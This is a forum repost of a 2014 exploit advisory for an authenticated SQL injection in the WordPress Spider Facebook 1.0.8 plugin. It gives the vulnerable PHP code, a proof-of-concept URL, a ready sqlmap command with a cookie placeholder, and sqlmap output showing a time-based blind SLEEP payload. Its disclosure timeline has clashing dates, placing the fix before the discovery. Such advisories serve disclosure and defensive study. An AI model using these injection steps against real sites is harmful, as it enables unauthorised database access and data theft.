SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection Vulnerability

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection Vulnerability

    کد:
    ######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
        if(!function_exists ('print_html_nav' ))
        require_once("nav_function/nav_html_func.php");
        global $wpdb;
        if(isset($_GET['id']))
        {
        $id=$_GET['id'];
        }
        else
        {
                $id=0;
        }
 
 
######################
 
# PoC Exploit:
 
http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
 
 
# Exploit Code via sqlmap:
 
sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1" -p id --dbms=mysql
 
[21:27:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
...
...
...
---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 AND SLEEP(5)
 
---
 
 
# PoC Video:
 
https://www.youtube.com/watch?v=CcuvHLWnjZo
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-08-25:  Discovered vulnerability
2014-09-04:  Vendor Notification (Web Customers Service Form)
2014-08-05:  Vendor Response/Feedback
2014-08-05:  Vendor Fix/Patch
2014-08-05:  Public Disclosure
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                 
                [email protected]
                [email protected]
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################
    [align=center]IRH WebScanner Tools V.1
    |90%//////////////////////////////////////////|

    [/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X